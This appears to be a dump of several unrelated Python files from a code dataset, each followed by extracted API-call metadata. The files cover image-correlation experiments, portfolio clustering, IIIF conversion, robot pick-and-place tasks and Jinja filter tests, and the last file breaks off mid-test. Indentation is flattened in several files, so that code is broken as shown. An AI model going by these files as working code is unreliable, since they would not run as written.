| [((13, 11, 13, 22), 'rest_framework.test.APIClient', 'APIClient', ({}, {}), '()', False, 'from rest_framework.test import APIClient\n'), ((18, 19, 18, 32), 'django.http.HttpRequest', 'HttpRequest', ({}, {}), '()', False, 'from django.http import HttpRequest\n'), ((25, 15, 25, 25), 'rest_framework.response.Response', 'Response', ({}, {}), '()', False, 'from rest_framework.response import Response\n'), ((26, 38, 26, 49), 'unittest.mock.Mock', 'mock.Mock', ({}, {}), '()', False, 'from unittest import mock\n'), ((34, 26, 34, 37), 'unittest.mock.Mock', 'mock.Mock', ({}, {}), '()', False, 'from unittest import mock\n'), ((41, 11, 41, 42), 'drf_viewset_profiler.middleware.LineProfilerViewSetMiddleware', 'LineProfilerViewSetMiddleware', ({}, {}), '()', False, 'from drf_viewset_profiler.middleware import LineProfilerViewSetMiddleware\n'), ((27, 48, 27, 59), 'unittest.mock.Mock', 'mock.Mock', ({}, {}), '()', False, 'from unittest import mock\n')] |
diehlpk/muDIC | Examples/VirtualLab/virtual_experiment_f.py | b5d90aa62267b4bd0b88ae0a989cf09a51990654 | # This allows for running the example when the repo has been cloned
import sys
from os.path import abspath
sys.path.extend([abspath(".")])
# Example code follows
import logging
import numpy as np
import matplotlib.pyplot as plt
import muDIC.vlab as vlab
import muDIC as dic
"""
This example case runs an experiment where a deformation gradient is used
to deform a synthetically generated speckle, the speckle is then down sampled by a factor of four
and sensor artifacts are included.
The analysis is then performed and the resulting deformation gradient field is compared to the
one used to deform the images
"""
# Set the amount of info printed to terminal during analysis
logging.basicConfig(format='%(name)s:%(levelname)s:%(message)s', level=logging.INFO)
show_results = False
# Define the image you want to analyse
n_imgs = 2
image_shape = (500, 500)
downsample_factor = 4
super_image_shape = tuple(dim * downsample_factor for dim in image_shape)
# Make a speckle image
speckle_image = vlab.rosta_speckle(super_image_shape, dot_size=4, density=0.5, smoothness=2.0)
# Make an image deformer that applies the deformation gradient F
F = np.array([[1.01,0],[0.01,1.0]])
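# F prescribes a 1% stretch along x (F[0,0]=1.01) plus a 1% shear component (F[1,0]=0.01)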
image_deformer = vlab.imageDeformer_from_defGrad(F)
# Make an image down-sampler including downscaling, fill-factor and sensor grid irregularities
downsampler = vlab.Downsampler(image_shape=super_image_shape, factor=downsample_factor, fill=.95,
pixel_offset_stddev=0.05)
# Make a noise injector producing 2% gaussian additive noise
noise_injector = vlab.noise_injector("gaussian", sigma=.02)
# Make an synthetic image generation pipeline
image_generator = vlab.SyntheticImageGenerator(speckle_image=speckle_image, image_deformer=image_deformer,
downsampler=downsampler, noise_injector=noise_injector, n=n_imgs)
# Put it into an image stack
image_stack = dic.ImageStack(image_generator)
# Now, make a mesh. Make sure to use enough elements
mesher = dic.Mesher(deg_n=3, deg_e=3,type="spline")
#mesh = mesher.mesh(image_stack) # Use this if you want to use a GUI
mesh = mesher.mesh(image_stack,Xc1=50,Xc2=450,Yc1=50,Yc2=450,n_ely=8,n_elx=8, GUI=False)
# Prepare the analysis input and initiate the analysis
dic_input = dic.DICInput(mesh, image_stack)  # renamed from "input" to avoid shadowing the built-in
dic_input.tol = 1e-6
dic_input.interpolation_order = 4
dic_job = dic.DICAnalysis(dic_input)
results = dic_job.run()
# Calculate the fields for later use. Seed is used when spline elements are used and upscale is used for Q4.
fields = dic.Fields(results, seed=101,upscale=10)
# We will now compare the results from the analysis to the deformation gradient which the image was deformed by
if show_results:
plt.figure()
plt.imshow(F[0,0] - fields.F()[0, 0,0, :, :, 1], cmap=plt.cm.magma)
plt.xlabel("Element e-coordinate")
plt.ylabel("Element n-coordinate")
plt.colorbar()
plt.title("Difference in deformation gradient component 0,0 within the element")
fig1 = plt.figure()
ax1 = fig1.add_subplot(111)
#line1 = ax1.plot(res_field[:, 50], label="correct")
line2 = ax1.plot(fields.F()[0, 0,0, :, 50, 1], label="DIC")
ax1.set_xlabel("element e-coordinate")
ax1.set_ylabel("Deformation gradient component 0,0 []")
ax2 = fig1.add_subplot(111, sharex=ax1, frameon=False)
line3 = ax2.plot(F[0,0] - fields.F()[0, 0,0, :, 50, 1], "r--", label="difference")
ax2.yaxis.tick_right()
ax2.yaxis.set_label_position("right")
ax2.set_ylabel("Deviation []")
plt.title("Deformation gradient component 0,0")
fig1.legend()
plt.show()
| [((23, 0, 23, 84), 'logging.basicConfig', 'logging.basicConfig', (), '', False, 'import logging\n'), ((34, 16, 34, 94), 'muDIC.vlab.rosta_speckle', 'vlab.rosta_speckle', (), '', True, 'import muDIC.vlab as vlab\n'), ((38, 4, 38, 35), 'numpy.array', 'np.array', ({(38, 13, 38, 34): '[[1.01, 0], [0.01, 1.0]]'}, {}), '([[1.01, 0], [0.01, 1.0]])', True, 'import numpy as np\n'), ((39, 17, 39, 51), 'muDIC.vlab.imageDeformer_from_defGrad', 'vlab.imageDeformer_from_defGrad', ({(39, 49, 39, 50): 'F'}, {}), '(F)', True, 'import muDIC.vlab as vlab\n'), ((42, 14, 43, 56), 'muDIC.vlab.Downsampler', 'vlab.Downsampler', (), '', True, 'import muDIC.vlab as vlab\n'), ((46, 17, 46, 59), 'muDIC.vlab.noise_injector', 'vlab.noise_injector', (), '', True, 'import muDIC.vlab as vlab\n'), ((49, 18, 50, 112), 'muDIC.vlab.SyntheticImageGenerator', 'vlab.SyntheticImageGenerator', (), '', True, 'import muDIC.vlab as vlab\n'), ((52, 14, 52, 45), 'muDIC.ImageStack', 'dic.ImageStack', ({(52, 29, 52, 44): 'image_generator'}, {}), '(image_generator)', True, 'import muDIC as dic\n'), ((55, 9, 55, 51), 'muDIC.Mesher', 'dic.Mesher', (), '', True, 'import muDIC as dic\n'), ((61, 8, 61, 39), 'muDIC.DICInput', 'dic.DICInput', ({(61, 21, 61, 25): 'mesh', (61, 27, 61, 38): 'image_stack'}, {}), '(mesh, image_stack)', True, 'import muDIC as dic\n'), ((65, 10, 65, 32), 'muDIC.DICAnalysis', 'dic.DICAnalysis', ({(65, 26, 65, 31): 'input'}, {}), '(input)', True, 'import muDIC as dic\n'), ((69, 9, 69, 49), 'muDIC.Fields', 'dic.Fields', (), '', True, 'import muDIC as dic\n'), ((74, 4, 74, 16), 'matplotlib.pyplot.figure', 'plt.figure', ({}, {}), '()', True, 'import matplotlib.pyplot as plt\n'), ((76, 4, 76, 38), 'matplotlib.pyplot.xlabel', 'plt.xlabel', ({(76, 15, 76, 37): '"""Element e-coordinate"""'}, {}), "('Element e-coordinate')", True, 'import matplotlib.pyplot as plt\n'), ((77, 4, 77, 38), 'matplotlib.pyplot.ylabel', 'plt.ylabel', ({(77, 15, 77, 37): '"""Element n-coordinate"""'}, {}), "('Element n-coordinate')", True, 'import matplotlib.pyplot as plt\n'), ((78, 4, 78, 18), 'matplotlib.pyplot.colorbar', 'plt.colorbar', ({}, {}), '()', True, 'import matplotlib.pyplot as plt\n'), ((79, 4, 79, 84), 'matplotlib.pyplot.title', 'plt.title', ({(79, 14, 79, 83): '"""Difference in deformation gradient component 0,0 within the element"""'}, {}), "('Difference in deformation gradient component 0,0 within the element'\n )", True, 'import matplotlib.pyplot as plt\n'), ((81, 11, 81, 23), 'matplotlib.pyplot.figure', 'plt.figure', ({}, {}), '()', True, 'import matplotlib.pyplot as plt\n'), ((93, 4, 93, 51), 'matplotlib.pyplot.title', 'plt.title', ({(93, 14, 93, 50): '"""Deformation gradient component 0,0"""'}, {}), "('Deformation gradient component 0,0')", True, 'import matplotlib.pyplot as plt\n'), ((96, 4, 96, 14), 'matplotlib.pyplot.show', 'plt.show', ({}, {}), '()', True, 'import matplotlib.pyplot as plt\n'), ((4, 17, 4, 29), 'os.path.abspath', 'abspath', ({(4, 25, 4, 28): '"""."""'}, {}), "('.')", False, 'from os.path import abspath\n')] |
ckaestne/toxicity-detector | src/template_config.py | bb00ffe4470c6c1a2f561212d487d56eab5a5da7 | mongo = { "user": "", "passwd": "", "db": "ghtorrent" }
perspective_api_key = ""
| [] |
COEJKnight/one | tests/unit/dataactvalidator/test_fabs38_detached_award_financial_assistance_2.py | 6a5f8cd9468ab368019eb2597821b7837f74d9e2 | from tests.unit.dataactcore.factories.staging import DetachedAwardFinancialAssistanceFactory
from tests.unit.dataactvalidator.utils import number_of_errors, query_columns
_FILE = 'fabs38_detached_award_financial_assistance_2'
def test_column_headers(database):
expected_subset = {"row_number", "awarding_office_code"}
actual = set(query_columns(_FILE, database))
assert expected_subset == actual
def test_success(database):
""" AwardingOfficeCode must be six characters long. """
det_award_1 = DetachedAwardFinancialAssistanceFactory(awarding_office_code='AAAAAA')
det_award_2 = DetachedAwardFinancialAssistanceFactory(awarding_office_code='111111')
det_award_3 = DetachedAwardFinancialAssistanceFactory(awarding_office_code='AAA111')
det_award_4 = DetachedAwardFinancialAssistanceFactory(awarding_office_code='')
det_award_5 = DetachedAwardFinancialAssistanceFactory(awarding_office_code=None)
errors = number_of_errors(_FILE, database, models=[det_award_1, det_award_2, det_award_3, det_award_4, det_award_5])
assert errors == 0
def test_failure(database):
""" AwardingOfficeCode must be six characters long. """
det_award_1 = DetachedAwardFinancialAssistanceFactory(awarding_office_code='AAAA1')
det_award_2 = DetachedAwardFinancialAssistanceFactory(awarding_office_code='AAAAAAA')
errors = number_of_errors(_FILE, database, models=[det_award_1, det_award_2])
assert errors == 2
| [((16, 18, 16, 88), 'tests.unit.dataactcore.factories.staging.DetachedAwardFinancialAssistanceFactory', 'DetachedAwardFinancialAssistanceFactory', (), '', False, 'from tests.unit.dataactcore.factories.staging import DetachedAwardFinancialAssistanceFactory\n'), ((17, 18, 17, 88), 'tests.unit.dataactcore.factories.staging.DetachedAwardFinancialAssistanceFactory', 'DetachedAwardFinancialAssistanceFactory', (), '', False, 'from tests.unit.dataactcore.factories.staging import DetachedAwardFinancialAssistanceFactory\n'), ((18, 18, 18, 88), 'tests.unit.dataactcore.factories.staging.DetachedAwardFinancialAssistanceFactory', 'DetachedAwardFinancialAssistanceFactory', (), '', False, 'from tests.unit.dataactcore.factories.staging import DetachedAwardFinancialAssistanceFactory\n'), ((19, 18, 19, 82), 'tests.unit.dataactcore.factories.staging.DetachedAwardFinancialAssistanceFactory', 'DetachedAwardFinancialAssistanceFactory', (), '', False, 'from tests.unit.dataactcore.factories.staging import DetachedAwardFinancialAssistanceFactory\n'), ((20, 18, 20, 84), 'tests.unit.dataactcore.factories.staging.DetachedAwardFinancialAssistanceFactory', 'DetachedAwardFinancialAssistanceFactory', (), '', False, 'from tests.unit.dataactcore.factories.staging import DetachedAwardFinancialAssistanceFactory\n'), ((21, 13, 21, 120), 'tests.unit.dataactvalidator.utils.number_of_errors', 'number_of_errors', (), '', False, 'from tests.unit.dataactvalidator.utils import number_of_errors, query_columns\n'), ((28, 18, 28, 87), 'tests.unit.dataactcore.factories.staging.DetachedAwardFinancialAssistanceFactory', 'DetachedAwardFinancialAssistanceFactory', (), '', False, 'from tests.unit.dataactcore.factories.staging import DetachedAwardFinancialAssistanceFactory\n'), ((29, 18, 29, 89), 'tests.unit.dataactcore.factories.staging.DetachedAwardFinancialAssistanceFactory', 'DetachedAwardFinancialAssistanceFactory', (), '', False, 'from tests.unit.dataactcore.factories.staging import DetachedAwardFinancialAssistanceFactory\n'), ((30, 13, 30, 81), 'tests.unit.dataactvalidator.utils.number_of_errors', 'number_of_errors', (), '', False, 'from tests.unit.dataactvalidator.utils import number_of_errors, query_columns\n'), ((9, 17, 9, 47), 'tests.unit.dataactvalidator.utils.query_columns', 'query_columns', ({(9, 31, 9, 36): '_FILE', (9, 38, 9, 46): 'database'}, {}), '(_FILE, database)', False, 'from tests.unit.dataactvalidator.utils import number_of_errors, query_columns\n')] |
BrandonAFong/Ideas | Optimisation Portfolios/HERC.py | 5d38be2dfaba12a534220e3f28a6c9da9aefcdec | #!/usr/bin/env python3
# -*- coding: utf-8 -*-
"""
Created on Tue Aug 31 22:48:21 2021
@author: apple
"""
import numpy as np
import pandas as pd
from HRP import seriation
import fastcluster
from scipy.cluster.hierarchy import fcluster
from gap_statistic import OptimalK
from backtest import df_to_matrix
#HERC
def intersection(list1, list2):
    # elements common to both lists, returned as a flat list so the caller can
    # sort it and compare it against a cluster's member list
    common = set(list2)
    return [v for v in list1 if v in common]
def compute_allocation(covar, clusters,Z,dimensions):
numClusters = len(clusters)
aWeights = np.array([1.] * len(covar))
cWeights = np.array([1.] * numClusters)
cVar = np.array([0.] * numClusters)
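    # pass 1: naive inverse-variance weights within each cluster, then each cluster's total variance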
for i, cluster in clusters.items():
cluster_covar = covar[cluster, :][:, cluster]
inv_diag = 1 / np.diag(cluster_covar)
aWeights[cluster] = inv_diag / np.sum(inv_diag)
for i, cluster in clusters.items():
weights = aWeights[cluster]
cVar[i - 1] = np.dot(
weights, np.dot(covar[cluster, :][:, cluster], weights))
for m in range(numClusters - 1):
left = int(Z[dimensions - 2 - m, 0])
lc = seriation(Z, dimensions, left)
right = int(Z[dimensions - 2 - m, 1])
rc = seriation(Z, dimensions, right)
id_lc = []
id_rc = []
for i, cluster in clusters.items():
if sorted(intersection(lc, cluster)) == sorted(cluster):
id_lc.append(i)
if sorted(intersection(rc, cluster)) == sorted(cluster):
id_rc.append(i)
id_lc = np.array(id_lc) - 1
id_rc = np.array(id_rc) - 1
alpha = 0
lcVar = np.sum(cVar[id_lc])
rcVar = np.sum(cVar[id_rc])
alpha = lcVar / (lcVar + rcVar)
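        # NOTE: textbook HERC/HRP uses alpha = 1 - lcVar/(lcVar + rcVar) so the less risky
        # sub-tree receives more weight; as written the riskier side is up-weighted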
cWeights[id_lc] = cWeights[
id_lc] * alpha
cWeights[id_rc] = cWeights[
id_rc] * (1 - alpha)
for i, cluster in clusters.items():
aWeights[cluster] = aWeights[cluster] * cWeights[
i - 1]
return aWeights
#Dataframe of returns
def HERC(mat_ret):
#Need to first calculate the optimal number of clusters
#The mat_ret that goes into this must be a np array of returns
# correl_mat = mat_ret.corr(method='pearson')
column_dic = {k:v for v, k in enumerate(mat_ret.columns)}
correl_mat = df_to_matrix(mat_ret.corr(method='pearson'))
dist = 1 - correl_mat
dim = len(dist)
tri_a, tri_b = np.triu_indices(dim, k = 1)
Z = fastcluster.linkage(dist[tri_a, tri_b], method='ward')
optimalK = OptimalK(parallel_backend = 'rust')
n_clusters = optimalK(mat_ret.values, cluster_array = np.arange(1,len(mat_ret)))
nb_clusters = n_clusters
clustering_inds = fcluster(Z, nb_clusters, criterion='maxclust')
clusters = {i: [] for i in range(min(clustering_inds),max(clustering_inds) + 1)}
for i, v in enumerate(clustering_inds):
clusters[v].append(i)
HERC_w = compute_allocation(correl_mat, clusters, Z, dim)
HERC_w = pd.Series(HERC_w)
my_inverted_dict = dict(map(reversed, column_dic.items()))
HERC_w = HERC_w.rename(index = my_inverted_dict)
return HERC_w
| [((30, 15, 30, 43), 'numpy.array', 'np.array', ({(30, 24, 30, 42): '[1.0] * numClusters'}, {}), '([1.0] * numClusters)', True, 'import numpy as np\n'), ((31, 11, 31, 39), 'numpy.array', 'np.array', ({(31, 20, 31, 38): '[0.0] * numClusters'}, {}), '([0.0] * numClusters)', True, 'import numpy as np\n'), ((91, 19, 91, 46), 'numpy.triu_indices', 'np.triu_indices', (), '', True, 'import numpy as np\n'), ((95, 8, 95, 62), 'fastcluster.linkage', 'fastcluster.linkage', (), '', False, 'import fastcluster\n'), ((97, 15, 97, 50), 'gap_statistic.OptimalK', 'OptimalK', (), '', False, 'from gap_statistic import OptimalK\n'), ((101, 22, 101, 68), 'scipy.cluster.hierarchy.fcluster', 'fcluster', (), '', False, 'from scipy.cluster.hierarchy import fcluster\n'), ((107, 13, 107, 30), 'pandas.Series', 'pd.Series', ({(107, 23, 107, 29): 'HERC_w'}, {}), '(HERC_w)', True, 'import pandas as pd\n'), ((45, 13, 45, 43), 'HRP.seriation', 'seriation', ({(45, 23, 45, 24): 'Z', (45, 26, 45, 36): 'dimensions', (45, 38, 45, 42): 'left'}, {}), '(Z, dimensions, left)', False, 'from HRP import seriation\n'), ((48, 13, 48, 44), 'HRP.seriation', 'seriation', ({(48, 23, 48, 24): 'Z', (48, 26, 48, 36): 'dimensions', (48, 38, 48, 43): 'right'}, {}), '(Z, dimensions, right)', False, 'from HRP import seriation\n'), ((65, 16, 65, 35), 'numpy.sum', 'np.sum', ({(65, 23, 65, 34): 'cVar[id_lc]'}, {}), '(cVar[id_lc])', True, 'import numpy as np\n'), ((66, 16, 66, 35), 'numpy.sum', 'np.sum', ({(66, 23, 66, 34): 'cVar[id_rc]'}, {}), '(cVar[id_rc])', True, 'import numpy as np\n'), ((35, 23, 35, 45), 'numpy.diag', 'np.diag', ({(35, 31, 35, 44): 'cluster_covar'}, {}), '(cluster_covar)', True, 'import numpy as np\n'), ((36, 39, 36, 55), 'numpy.sum', 'np.sum', ({(36, 46, 36, 54): 'inv_diag'}, {}), '(inv_diag)', True, 'import numpy as np\n'), ((41, 21, 41, 67), 'numpy.dot', 'np.dot', ({(41, 28, 41, 57): 'covar[(cluster), :][:, (cluster)]', (41, 59, 41, 66): 'weights'}, {}), '(covar[(cluster), :][:, (cluster)], weights)', True, 'import numpy as np\n'), ((61, 16, 61, 31), 'numpy.array', 'np.array', ({(61, 25, 61, 30): 'id_lc'}, {}), '(id_lc)', True, 'import numpy as np\n'), ((62, 16, 62, 31), 'numpy.array', 'np.array', ({(62, 25, 62, 30): 'id_rc'}, {}), '(id_rc)', True, 'import numpy as np\n')] |
nakamura196/i3 | src/conv/convertManifest2Curation.py | 16d7695e5412b45dc8e0192d9ca285723ac9f788 | import urllib.request
from bs4 import BeautifulSoup
import csv
import requests
import os
import json
import time
import glob
files = glob.glob("/Users/nakamura/git/d_iiif/iiif/src/collections/nijl/data/json/*.json")
for i in range(len(files)):
file = files[i]
file_id = file.split("/")[-1].replace(".json", "")
opath = "/Users/nakamura/git/d_iiif/iiif/src/collections/nijl/data/curation/"+file_id+".json"
if not os.path.exists(opath):
fw = open(opath, 'w')
curation_data = {}
curation_uri = "curation:"+file_id+".json"
with open(file) as f:
try:
df = json.load(f)
except:
continue
anno_count = 1
if "sequences" in df:
print(file)
members = []
canvases = df["sequences"][0]["canvases"]
for j in range(len(canvases)):
canvas = canvases[j]
if "otherContent" in canvas:
id = canvas["otherContent"][0]["@id"]
headers = {"content-type": "application/json"}
# time.sleep(0.5)
r = requests.get(id, headers=headers)
data = r.json()
print(id)
resources = data["resources"]
for resource in resources:
member_id = resource["on"]
res = resource["resource"]
chars = res["chars"]
member = {
"@id": member_id,
"@type": "sc:Canvas",
"label": "[Annotation " + str(anno_count) + "]",
"description": chars,
"metadata": [
{
"label": res["@type"],
"value": chars
}
]
}
anno_count += 1
members.append(member)
if len(members) > 0:
label = ""
if "label" in df:
label = df["label"]
curation_data = {
"@context": [
"http://iiif.io/api/presentation/2/context.json",
"http://codh.rois.ac.jp/iiif/curation/1/context.json"
],
"@type": "cr:Curation",
"@id": curation_uri,
"label": "Automatic curation by IIIF Converter",
"selections": [
{
"@id": curation_uri + "/range1",
"@type": "sc:Range",
"label": "Automatic curation by IIIF Converter",
"members": members,
"within": {
"@id": df["@id"],
"@type": "sc:Manifest",
"label": label
}
}
]
}
        json.dump(curation_data, fw, ensure_ascii=False, indent=4, sort_keys=True, separators=(',', ': '))
        fw.close()
| [((10, 8, 10, 90), 'glob.glob', 'glob.glob', ({(10, 18, 10, 89): '"""/Users/nakamura/git/d_iiif/iiif/src/collections/nijl/data/json/*.json"""'}, {}), "(\n '/Users/nakamura/git/d_iiif/iiif/src/collections/nijl/data/json/*.json')", False, 'import glob\n'), ((20, 11, 20, 32), 'os.path.exists', 'os.path.exists', ({(20, 26, 20, 31): 'opath'}, {}), '(opath)', False, 'import os\n'), ((111, 8, 111, 106), 'json.dump', 'json.dump', (), '', False, 'import json\n'), ((29, 21, 29, 33), 'json.load', 'json.load', ({(29, 31, 29, 32): 'f'}, {}), '(f)', False, 'import json\n'), ((51, 28, 51, 61), 'requests.get', 'requests.get', (), '', False, 'import requests\n')] |
GaLaXy102/Vacationing | programme.py | e476f1047deeca8f68897a497716319afab3e7f0 | from lib import get_itineraries
import data
if __name__ == '__main__':
for itinerary in get_itineraries(data.sicily):
print("#" * 24)
print(itinerary)
print("")
| [((5, 21, 5, 49), 'lib.get_itineraries', 'get_itineraries', ({(5, 37, 5, 48): 'data.sicily'}, {}), '(data.sicily)', False, 'from lib import get_itineraries\n')] |
rlagywjd802/gym-sawyer | sawyer/mujoco/tasks/transition_pick_and_place_task.py | 385bbeafcccb61afb9099554f6a99b16f1f1a7c5 | import numpy as np
from sawyer.mujoco.tasks.base import ComposableTask
class TransitionTask(ComposableTask):
"""
Task to pick up an object with the robot gripper.
Success condition:
- Object is grasped and has been lifted above the table
"""
def __init__(self):
pass
def compute_reward(self, obs, info):
return 0
def is_success(self, obs, info=None, init=None):
raise NotImplementedError
def is_terminate(self, obs, init):
return self.is_success(obs, init=init)
def is_fail(self, obs):
raise NotImplementedError
def reset(self):
pass
@property
def completion_bonus(self):
return self._completion_bonus
class TransitionPickTask(TransitionTask):
"""
Task to pick up an object with the robot gripper.
Success condition:
- Object is grasped and has been lifted above the table
"""
def __init__(self,
success_thresh=0.05,
object_lift_target=0.3,
completion_bonus=0):
self._success_thresh = success_thresh
self._obj_lift_target = object_lift_target
self._completion_bonus = completion_bonus
self._t = 0
def is_success(self, obs, info=None, init=None):
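        # NOTE: success is short-circuited here, so the distance-based check below is effectively dead code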
return True
if init:
self.reset()
goal = obs[11:14] + np.array([0, 0, 0.04])
box_pos = obs[4:7]
d = np.linalg.norm(box_pos - goal, axis=-1)
print("****[pick/is success] box_pos:{}, goal:{}, d:{}".format(box_pos, goal, d))
return d < self._success_thresh
def is_fail(self, obs):
self._t += 1
if self._t >= 1 and not self.is_success(obs):
return True
return False
def reset(self):
self._t = 0
class TransitionPlaceTask(TransitionTask):
"""
Task to place object at a desired location.
"""
def __init__(self,
success_thresh=0.015,
completion_bonus=0):
self._success_thresh = success_thresh
self._completion_bonus = completion_bonus
self._prev_box_pos = None
def is_success(self, obs, info=None, init=None):
if init:
self.reset()
box_pos = obs[4:7]
goal = obs[11:14]
max_xy_diff = 0.03
abs_diff = abs(box_pos - goal)
print("****[place/is success] abs_diff:{}".format(abs_diff))
return ( abs_diff[0] < max_xy_diff and
abs_diff[1] < max_xy_diff and
box_pos[2] < 0.21 )
def is_fail(self, obs):
box_pos = obs[4:7]
goal = obs[11:14]
max_xy_diff = 0.03
abs_diff = abs(box_pos - goal)
if self._prev_box_pos is None:
self._prev_box_pos = box_pos
else:
max_z_diff = 0.009
z_diff = self._prev_box_pos[2] - box_pos[2]
print("****[place/is_fail] z_diff:{}, box_pos_z:{}".format(z_diff, box_pos[2]))
print(self._prev_box_pos[2], box_pos[2])
if abs_diff[0] > max_xy_diff or abs_diff[1] > max_xy_diff or z_diff < max_z_diff:
return True
else:
self._prev_box_pos = box_pos
return False
def reset(self):
self._prev_box_pos = None
class TransitionPickAndPlaceTask(TransitionTask):
"""
Task to pick up an object and place the object at a desired location.
    Success condition:
        - Object has been placed within a small tolerance of the goal position
"""
def __init__(self,
success_thresh=0.01,
completion_bonus=0):
self._success_thresh = success_thresh
self._completion_bonus = completion_bonus
self._prev_box_pos = None
self._picked = False
self._placing = False
def is_success(self, obs, info=None, init=None):
if init:
self.reset()
box_pos = obs[4:7]
goal = obs[11:14]
max_xy_diff = 0.02
abs_diff = abs(box_pos - goal)
print("****[pick&place/is success] abs_diff:{}, box_z:{}".format(abs_diff, box_pos[2]))
return ( abs_diff[0] < max_xy_diff and
abs_diff[1] < max_xy_diff and
box_pos[2] < 0.22 )
def is_fail(self, obs):
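        # called repeatedly during the transition; _picked/_placing track which phase (pick vs. place) is being monitored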
box_pos = obs[4:7]
goal = obs[11:14]
abs_diff = abs(box_pos - goal)
max_xy_diff = 0.03
if self._picked:
self._placing = True
print("placing True")
else:
print("placing False")
if self._picked and not self._placing:
print("return True")
return True
self._picked = True
if self._placing:
if self._prev_box_pos is None:
self._prev_box_pos = box_pos
else:
max_z_diff = 0.009
z_diff = self._prev_box_pos[2] - box_pos[2]
print("****[pick&place/is_fail] z_diff:{}, box_pos_z:{}".format(z_diff, box_pos[2]))
print(self._prev_box_pos[2], box_pos[2])
if box_pos[2] < 0.24 and (abs_diff[0] > max_xy_diff or abs_diff[1] > max_xy_diff or z_diff < max_z_diff):
print("return True")
return True
else:
self._prev_box_pos = box_pos
return False
def get_next_primitive(self, obs, prev_primitive):
if prev_primitive == -1:
return 'pick'
return 'place'
def reset(self):
self._picked = False
self._placing = False
self._prev_box_pos = None
| [((58, 12, 58, 51), 'numpy.linalg.norm', 'np.linalg.norm', (), '', True, 'import numpy as np\n'), ((56, 28, 56, 50), 'numpy.array', 'np.array', ({(56, 37, 56, 49): '[0, 0, 0.04]'}, {}), '([0, 0, 0.04])', True, 'import numpy as np\n')] |
nealedj/eq-survey-runner | tests/app/test_jinja_filters.py | b8e6cddae6068f6c8fd60e21d31d58aaa79bbb34 | # coding: utf-8
from types import SimpleNamespace
from datetime import datetime, timedelta
from unittest.mock import patch
from dateutil.relativedelta import relativedelta
from jinja2 import Undefined, Markup
from mock import Mock
from app.jinja_filters import (
format_date, format_conditional_date, format_currency, get_currency_symbol,
format_multilined_string, format_percentage, format_date_range,
format_household_member_name, format_datetime,
format_number_to_alphabetic_letter, format_unit, format_currency_for_input,
format_number, format_unordered_list, format_unit_input_label,
format_household_member_name_possessive, concatenated_list,
calculate_years_difference, get_current_date, as_london_tz, max_value,
min_value, get_question_title, get_answer_label,
format_duration, calculate_offset_from_weekday_in_last_whole_week, format_date_custom,
format_date_range_no_repeated_month_year, format_repeating_summary, format_address_list)
from tests.app.app_context_test_case import AppContextTestCase
class TestJinjaFilters(AppContextTestCase): # pylint: disable=too-many-public-methods
def setUp(self):
self.autoescape_context = Mock(autoescape=True)
super(TestJinjaFilters, self).setUp()
@patch('app.jinja_filters.flask_babel.get_locale', Mock(return_value='en_GB'))
def test_format_currency_for_input(self):
self.assertEqual(format_currency_for_input('100', 2), '100.00')
self.assertEqual(format_currency_for_input('100.0', 2), '100.00')
self.assertEqual(format_currency_for_input('100.00', 2), '100.00')
self.assertEqual(format_currency_for_input('1000'), '1,000')
self.assertEqual(format_currency_for_input('10000'), '10,000')
self.assertEqual(format_currency_for_input('100000000'), '100,000,000')
self.assertEqual(format_currency_for_input('100000000', 2), '100,000,000.00')
self.assertEqual(format_currency_for_input(0, 2), '0.00')
self.assertEqual(format_currency_for_input(0), '0')
self.assertEqual(format_currency_for_input(''), '')
self.assertEqual(format_currency_for_input(None), '')
self.assertEqual(format_currency_for_input(Undefined()), '')
@patch('app.jinja_filters.flask_babel.get_locale', Mock(return_value='en_GB'))
def test_get_currency_symbol(self):
self.assertEqual(get_currency_symbol('GBP'), '£')
self.assertEqual(get_currency_symbol('EUR'), '€')
self.assertEqual(get_currency_symbol('USD'), 'US$')
self.assertEqual(get_currency_symbol('JPY'), 'JP¥')
self.assertEqual(get_currency_symbol(''), '')
@patch('app.jinja_filters.flask_babel.get_locale', Mock(return_value='en_GB'))
def test_format_currency(self):
self.assertEqual(format_currency(self.autoescape_context, '11', 'GBP'), "<span class='date'>£11.00</span>")
self.assertEqual(format_currency(self.autoescape_context, '11.99', 'GBP'), "<span class='date'>£11.99</span>")
self.assertEqual(format_currency(self.autoescape_context, '11000', 'USD'), "<span class='date'>US$11,000.00</span>")
self.assertEqual(format_currency(self.autoescape_context, 0), "<span class='date'>£0.00</span>")
self.assertEqual(format_currency(self.autoescape_context, 0.00), "<span class='date'>£0.00</span>")
self.assertEqual(format_currency(self.autoescape_context, '', ), "<span class='date'></span>")
self.assertEqual(format_currency(self.autoescape_context, None), "<span class='date'></span>")
self.assertEqual(format_currency(self.autoescape_context, Undefined()), "<span class='date'></span>")
@patch('app.jinja_filters.flask_babel.get_locale', Mock(return_value='en_GB'))
def test_format_number(self):
self.assertEqual(format_number(123), '123')
self.assertEqual(format_number('123.4'), '123.4')
self.assertEqual(format_number('123.40'), '123.4')
self.assertEqual(format_number('1000'), '1,000')
self.assertEqual(format_number('10000'), '10,000')
self.assertEqual(format_number('100000000'), '100,000,000')
self.assertEqual(format_number(0), '0')
self.assertEqual(format_number(0.00), '0')
self.assertEqual(format_number(''), '')
self.assertEqual(format_number(None), '')
self.assertEqual(format_number(Undefined()), '')
def test_format_multilined_string_matches_carriage_return(self):
# Given
new_line = 'this is on a new\rline'
# When
format_value = format_multilined_string(self.autoescape_context, new_line)
self.assertEqual(format_value, 'this is on a new<br>line')
def test_format_multilined_string_matches_new_line(self):
# Given
new_line = 'this is on a new\nline'
# When
format_value = format_multilined_string(self.autoescape_context,
new_line)
self.assertEqual(format_value, 'this is on a new<br>line')
def test_format_multilined_string_matches_carriage_return_new_line(self):
# Given
new_line = 'this is on a new\r\nline'
# When
format_value = format_multilined_string(self.autoescape_context, new_line)
self.assertEqual(format_value, 'this is on a new<br>line')
def test_format_multilined_string(self):
# Given
new_line = 'this is\ron a\nnew\r\nline'
# When
format_value = format_multilined_string(self.autoescape_context,
new_line)
self.assertEqual(format_value, 'this is<br>on a<br>new<br>line')
def test_format_multilined_string_auto_escape(self):
# Given
new_line = '<'
# When
format_value = format_multilined_string(self.autoescape_context, new_line)
self.assertEqual(str(format_value), '<')
def test_get_current_date(self):
# Given
date_format = '%-d %B %Y'
# When
format_value = get_current_date(self.autoescape_context)
current_date = as_london_tz(datetime.utcnow()).strftime(date_format)
# Then
self.assertEqual(format_value, "<span class='date'>{date}</span>".format(date=current_date))
def test_format_date(self):
# Given
date = '2017-01-01'
# When
with self.app_request_context('/'):
format_value = format_date(self.autoescape_context, date)
# Then
self.assertEqual(format_value, "<span class='date'>1 January 2017</span>")
def test_format_date_month_year(self):
# Given
date = '2017-01'
# When
